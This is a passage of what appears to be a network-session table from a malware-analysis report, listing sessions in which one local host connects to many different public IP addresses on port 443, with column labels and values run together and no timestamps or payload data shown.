                                            24555192.168.2.235520848.245.169.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24556192.168.2.2356964149.32.201.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24557192.168.2.234383842.1.184.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24558192.168.2.234286218.218.12.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24559192.168.2.2358334167.28.213.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24560192.168.2.2350044177.94.153.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24561192.168.2.235973897.210.126.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24562192.168.2.2342908179.15.60.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24563192.168.2.2339528120.192.73.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24564192.168.2.233319072.133.211.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24565192.168.2.2348920110.151.227.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24566192.168.2.2340602150.231.1.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24567192.168.2.2333592120.233.78.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24568192.168.2.2344664118.234.83.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24569192.168.2.2340938121.247.98.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24570192.168.2.235142037.172.222.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24571192.168.2.2353010137.148.109.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24572192.168.2.235615872.103.8.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24573192.168.2.2341436132.114.141.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24574192.168.2.2333944117.175.141.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24575192.168.2.2353406104.149.86.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24576192.168.2.2350232202.182.20.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24577192.168.2.2347950104.86.33.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24578192.168.2.2359830169.242.60.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24579192.168.2.235516414.76.221.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24580192.168.2.234769881.78.119.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24581192.168.2.2337056185.142.56.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24582192.168.2.2335616196.105.228.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24583192.168.2.233463285.111.81.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24584192.168.2.2335356210.199.10.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24585192.168.2.233291659.208.114.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24586192.168.2.2334760184.125.165.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24587192.168.2.2347302190.177.17.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24588192.168.2.235504054.244.131.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24589192.168.2.2339946152.214.170.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24590192.168.2.235200857.62.88.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24591192.168.2.2353756202.152.178.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24592192.168.2.233728266.113.156.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24593192.168.2.234348666.67.3.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24594192.168.2.2334544144.199.178.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24595192.168.2.233853886.2.174.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24596192.168.2.234172232.127.176.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24597192.168.2.234768014.187.208.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24598192.168.2.235701697.233.171.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24599192.168.2.234119225.67.27.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24600192.168.2.2348578188.227.230.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24601192.168.2.2350806131.101.225.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24602192.168.2.233399891.16.48.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24603192.168.2.2349554150.116.60.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24604192.168.2.234675824.1.42.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24605192.168.2.2347654176.61.188.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24606192.168.2.2351940114.14.184.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24607192.168.2.235476847.107.148.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24608192.168.2.2339186141.178.185.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24609192.168.2.2347020124.71.167.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24610192.168.2.2350704194.117.8.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24611192.168.2.234520435.118.30.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24612192.168.2.2353942195.71.69.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24613192.168.2.2355476123.45.12.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24614192.168.2.2359916189.17.122.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24615192.168.2.2341432199.46.233.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24616192.168.2.233733461.163.62.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24617192.168.2.2353782112.167.216.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24618192.168.2.2357876201.198.98.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24619192.168.2.233632272.91.25.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24620192.168.2.2351486128.130.19.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24621192.168.2.2350400118.141.1.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24622192.168.2.2333088107.168.118.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24623192.168.2.235734297.27.157.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24624192.168.2.2341008143.93.168.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24625192.168.2.2339354154.123.175.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24626192.168.2.2349654152.180.131.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24627192.168.2.236085469.160.200.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24628192.168.2.2351604185.201.115.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24629192.168.2.234094863.27.234.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24630192.168.2.233581278.112.122.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24631192.168.2.2338320147.230.173.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24632192.168.2.235046887.29.125.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24633192.168.2.2349842131.143.92.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24634192.168.2.235242458.150.151.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24635192.168.2.236012247.246.136.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24636192.168.2.2342058124.31.232.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24637192.168.2.235181825.99.187.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24638192.168.2.2344242146.59.155.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24639192.168.2.234345476.174.228.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24640192.168.2.233905838.235.151.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24641192.168.2.234679269.142.66.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24642192.168.2.235115838.128.106.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24643192.168.2.234962241.6.205.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24644192.168.2.235920088.121.58.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24645192.168.2.2339622197.221.230.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24646192.168.2.2358614111.131.40.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24647192.168.2.2343056218.176.205.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24648192.168.2.234139437.5.112.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24649192.168.2.233677824.113.8.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24650192.168.2.2344302169.219.72.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24651192.168.2.2335552141.255.106.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24652192.168.2.2335900120.178.222.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24653192.168.2.23338685.50.232.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24654192.168.2.2346478151.83.231.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24655192.168.2.235503669.35.75.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24656192.168.2.235051678.108.225.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24657192.168.2.2342962163.192.142.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24658192.168.2.2347970141.171.237.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24659192.168.2.2353794173.10.8.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24660192.168.2.2355546113.169.80.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24661192.168.2.2349394178.103.62.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24662192.168.2.2355128104.0.42.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24663192.168.2.2335620175.191.58.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24664192.168.2.235500442.224.93.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24665192.168.2.2336076130.248.219.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24666192.168.2.2355146209.98.161.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24667192.168.2.233737669.231.166.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24668192.168.2.235005837.166.227.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24669192.168.2.2360382188.117.154.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24670192.168.2.2349566213.235.216.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24671192.168.2.2342464178.10.2.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24672192.168.2.2357902194.48.179.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24673192.168.2.23334828.153.184.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24674192.168.2.2338084112.24.58.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24675192.168.2.2336182163.36.65.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24676192.168.2.233436876.16.93.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24677192.168.2.234799447.107.214.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24678192.168.2.2344874137.252.190.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24679192.168.2.2343750188.239.42.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24680192.168.2.234360414.117.49.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24681192.168.2.235913837.2.40.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24682192.168.2.2345532101.1.236.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24683192.168.2.2339950143.2.196.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24684192.168.2.235357245.84.233.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24685192.168.2.233417050.252.82.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24686192.168.2.235054827.135.218.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24687192.168.2.2345736219.171.7.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24688192.168.2.234038482.225.86.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24689192.168.2.2346524148.41.14.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24690192.168.2.233349696.180.49.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24691192.168.2.235700289.206.204.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24692192.168.2.233406492.211.166.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24693192.168.2.2352474139.28.255.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24694192.168.2.2349870189.11.218.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24695192.168.2.2349070193.186.93.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24696192.168.2.234776248.27.15.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24697192.168.2.234220024.4.14.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24698192.168.2.234125850.74.123.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24699192.168.2.235830473.236.216.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24700192.168.2.2350194196.79.145.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24701192.168.2.234599038.133.59.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24702192.168.2.2340390148.83.206.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24703192.168.2.233827617.247.209.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24704192.168.2.2355010212.26.38.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24705192.168.2.235896667.192.60.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24706192.168.2.2346396151.14.184.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24707192.168.2.2347600112.29.235.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24708192.168.2.2351256183.228.166.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24709192.168.2.2333142166.23.64.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24710192.168.2.2339970188.208.66.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24711192.168.2.2348250143.136.248.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24712192.168.2.234965053.26.23.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24713192.168.2.234240465.252.55.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24714192.168.2.2348826194.117.101.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24715192.168.2.235122462.15.74.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24716192.168.2.234442897.181.160.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24717192.168.2.2354876104.250.39.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24718192.168.2.2341702187.94.53.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24719192.168.2.2340628137.194.52.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24720192.168.2.2334456162.214.42.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24721192.168.2.2338280107.212.68.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24722192.168.2.2336824198.188.177.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24723192.168.2.234827297.7.254.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24724192.168.2.235292659.172.167.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24725192.168.2.235550678.7.71.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24726192.168.2.2333288156.6.102.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24727192.168.2.2342382205.74.112.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24728192.168.2.2335006121.166.91.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24729192.168.2.2360110207.102.199.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24730192.168.2.2344820171.233.232.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24731192.168.2.234483223.190.107.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24732192.168.2.233607271.25.187.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24733192.168.2.236062499.253.113.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24734192.168.2.233696287.105.222.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24735192.168.2.23381848.238.107.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24736192.168.2.235891868.129.226.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24737192.168.2.2343662126.5.241.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24738192.168.2.2340704110.187.15.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24739192.168.2.2343872209.219.235.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24740192.168.2.2340972173.94.130.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24741192.168.2.2334400194.42.102.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24742192.168.2.235752852.137.101.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24743192.168.2.233506270.241.211.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24744192.168.2.2344308131.193.224.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24745192.168.2.2338870119.205.220.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24746192.168.2.2360708134.62.78.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24747192.168.2.2346958207.171.246.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24748192.168.2.235739214.227.217.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24749192.168.2.235118642.135.80.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24750192.168.2.2345478189.51.252.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24751192.168.2.2336024216.154.57.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24752192.168.2.2345566197.124.20.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24753192.168.2.2360924107.165.14.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24754192.168.2.2356528194.162.46.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24755192.168.2.2343364138.232.60.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24756192.168.2.235705617.138.205.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24757192.168.2.2358304119.39.205.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24758192.168.2.2358850153.115.154.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24759192.168.2.2353712110.211.55.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24760192.168.2.235842660.101.88.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24761192.168.2.233321690.145.122.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24762192.168.2.2333280202.215.131.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24763192.168.2.23423388.171.196.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24764192.168.2.235343879.207.93.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24765192.168.2.235682867.123.180.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24766192.168.2.235696214.31.126.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24767192.168.2.2356232149.78.255.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24768192.168.2.2355504161.65.250.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24769192.168.2.2354656103.35.169.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24770192.168.2.2333614121.138.150.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24771192.168.2.235486253.12.241.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24772192.168.2.2345488123.181.134.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24773192.168.2.2358304125.9.112.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24774192.168.2.233941486.164.240.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24775192.168.2.2360998195.106.49.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24776192.168.2.234955666.137.114.158443
                                            TimestampBytes transferredDirectionData


